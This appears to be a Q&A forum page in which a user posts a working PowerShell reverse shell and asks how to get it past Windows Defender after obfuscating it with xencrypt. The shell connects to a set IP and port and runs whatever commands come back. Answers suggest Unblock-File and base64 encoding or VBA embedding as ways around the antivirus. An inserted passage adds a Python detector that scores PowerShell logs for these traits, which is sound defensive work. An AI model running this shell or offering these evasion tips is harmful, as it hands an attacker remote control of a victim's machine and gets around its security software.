0

I'm trying to run a PowerShell reverse shell on Windows 10. Anyway, every time it is blocked by Windows Defender. How can I bypass it?

In a file I store the payload:

```powershell
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
```

Then I use xencrypt (https://github.com/the-xentropy/xencrypt) to obfuscate the code, but when I run `powershell -NoP -NonI -W Hidden -Exec Bypass .\revshell.ps1`

I get:

```text
Questo script include contenuto dannoso ed è stato bloccato dal software antivirus.
In riga:18 car:1
+ IEX($piifnga)
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
```

QUESTION: is there a way to bypass this check?

Maicake
  • 1,046
  • 10
  • 34

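From the defender's side, the `ScriptContainedMaliciousContent` error above is AMSI refusing the script at `Invoke-Expression` time, and the same artifacts (TCPClient plus a network-fed `iex`, the `-NoP -W Hidden -Exec Bypass` launch flags, an encoded command) are what a log-based detection keys on. The following is an added example, not code from the question or from xencrypt: it scores constructed PowerShell script-block log entries (the kind recorded in event 4104) against indicators taken from the question, decoding any `-EncodedCommand` payload first. The event records, weights and threshold are assumptions for illustration.

```python
import base64
import re

# Indicators drawn from the reverse shell and launch command in the question; weights are assumed.
INDICATORS = {
    "tcpclient":   (re.compile(r"Net\.Sockets\.TCPClient", re.I), 3),
    "iex":         (re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 2),
    "stream_read": (re.compile(r"\.GetStream\(\)|\.Read\(\$\w+,\s*0", re.I), 2),
    "hidden":      (re.compile(r"-W(indowStyle)?\s+Hidden", re.I), 1),
    "bypass":      (re.compile(r"-Exec(utionPolicy)?\s+Bypass", re.I), 1),
    "noprofile":   (re.compile(r"-NoP(rofile)?\b", re.I), 1),
}
# powershell.exe accepts -e / -ec / -enc / -EncodedCommand followed by base64 of UTF-16LE text.
ENCODED = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if there is none or it is malformed."""
    m = ENCODED.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(text):
    """Expand any encoded command, then return (score, matched indicator names)."""
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + "\n" + decoded  # match on both the wrapper and the real content
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    score = sum(INDICATORS[h][1] for h in hits)
    if decoded:
        hits.append("encoded_command")
        score += 2
    return score, hits


def triage(events, threshold=5):
    """Return ids of logged script blocks whose indicator score reaches the threshold."""
    return [e["id"] for e in events if score_script_block(e["script"])[0] >= threshold]


# Constructed stand-ins for Microsoft-Windows-PowerShell/Operational 4104 records (not real logs).
_ENCODED_SAMPLE = base64.b64encode(
    "$c = New-Object System.Net.Sockets.TCPClient('10.0.0.5',4444); iex $d".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": "4104-0001", "script": "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.5',4444);"
                                  "$stream = $client.GetStream(); $sendback = (iex $data 2>&1 | Out-String)"},
    {"id": "4104-0002", "script": "Get-ChildItem C:\\Logs -Filter *.log | Where-Object Length -gt 1MB"},
    {"id": "4104-0003", "script": "powershell -NoP -NonI -W Hidden -Exec Bypass -enc " + _ENCODED_SAMPLE},
]
```

Run `triage(SAMPLE_EVENTS)` to get the two suspicious ids; the benign file-listing entry scores zero.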
2 Answers

0

Have you tried `Unblock-File .\revshell.ps1` before trying to run the reverse shell script (understanding the risks associated with running untrusted code downloaded onto the machine)?

WaitingForGuacamole
  • 3,744
  • 1
  • 8
  • 22
  • Welcome to Stack Overflow! I recommend against rhetorical questions in answers. They risk being misunderstood as not an answer at all. You are trying to answer the question at the top of this page, aren't you? Otherwise please delete this post. – Yunnosch Feb 22 '21 at 22:53
  • It's not rhetorical - I suggested `Unblock-File` as the solution to the question, pointing out that there needs to be an awareness that there is risk. I do believe that it could be the correct technical solution to the problem; however, if I do not point out that there is some security risk, where I believe that to be true, I'm being irresponsible. – WaitingForGuacamole Feb 22 '21 at 23:46
  • If it is not a rhetorical question then it is not an answer. Please delete this non-answer and ask your question on this question as a comment (you do have the commenting privilege). – Yunnosch Feb 23 '21 at 06:39
-1

Just encode it, or you can change it to base64 to embed it in VBA.